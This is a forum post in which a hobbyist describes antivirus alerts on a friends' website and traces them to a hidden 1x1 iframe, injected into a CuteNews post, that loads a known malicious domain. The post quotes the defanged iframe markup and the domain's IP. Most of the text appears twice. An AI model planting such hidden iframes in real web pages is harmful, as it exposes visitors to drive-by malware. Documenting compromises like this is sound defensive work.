Me and a group of old schoolfriends had set up a website several years ago, just for us to mess around with, though it was mainly used just as webspace to upload junk. We did come up with a half-arse website to go with it, but nobody visited it (afterall, why would they?) It was just fun messing about with dreamweaver in our spare time.
Anyway, I went to the main page today, and it set my AV off (Nod32) with a 'html iframe.b.gen virus'. Asked one of them to check it out, and his AVG also went off, so I'm guessing its not a false positive.
I also got:
Address has been blocked
devi56.co.cc/td/go.php?sid=1
ip address 58.218.199.239:80
A quick google reveals that devi site is bad news, containing all sorts of nasties.
Anyway, the problem is that none of us are much good with html and so on, but I loaded up the index2.php page from where the warning generates, and I can't see anything relating to that devi website, but that would be too easy, wouldn't it?
So... I know I'll probably end up wiping it anyway, but since nobody visits the site, there's no risk of them being infected, but I'm curious to find how exactly the malicious code's there. I've just noticed that adblock lists the devi website as a frame.
So... is there a simplish way of tracking it down? I'm not going to link to the site for obvious reasons, but I could post html and php if it helps.
Thanks!
Edit: After typing all that, I've found it. In firefoxI set it to view 'no style', and there was a blocked frame under a cutenews post. At the end of the most recent one, it had <iframe src="hxxp://devi56.co.cc/td/go.php?sid=1" style="visibility: hidden;" height="1" width="1"></iframe> edited onto the end of it. The friend who posted it has now been emailed, shouting at them and asking them to change their passwords.
Well, that was fun ^^
Anyway, I went to the main page today, and it set my AV off (Nod32) with a 'html iframe.b.gen virus'. Asked one of them to check it out, and his AVG also went off, so I'm guessing its not a false positive.
I also got:
Address has been blocked
devi56.co.cc/td/go.php?sid=1
ip address 58.218.199.239:80
A quick google reveals that devi site is bad news, containing all sorts of nasties.
Anyway, the problem is that none of us are much good with html and so on, but I loaded up the index2.php page from where the warning generates, and I can't see anything relating to that devi website, but that would be too easy, wouldn't it?
So... I know I'll probably end up wiping it anyway, but since nobody visits the site, there's no risk of them being infected, but I'm curious to find how exactly the malicious code's there. I've just noticed that adblock lists the devi website as a frame.
So... is there a simplish way of tracking it down? I'm not going to link to the site for obvious reasons, but I could post html and php if it helps.
Thanks!
Edit: After typing all that, I've found it. In firefoxI set it to view 'no style', and there was a blocked frame under a cutenews post. At the end of the most recent one, it had <iframe src="hxxp://devi56.co.cc/td/go.php?sid=1" style="visibility: hidden;" height="1" width="1"></iframe> edited onto the end of it. The friend who posted it has now been emailed, shouting at them and asking them to change their passwords.
Well, that was fun ^^
Last edited:
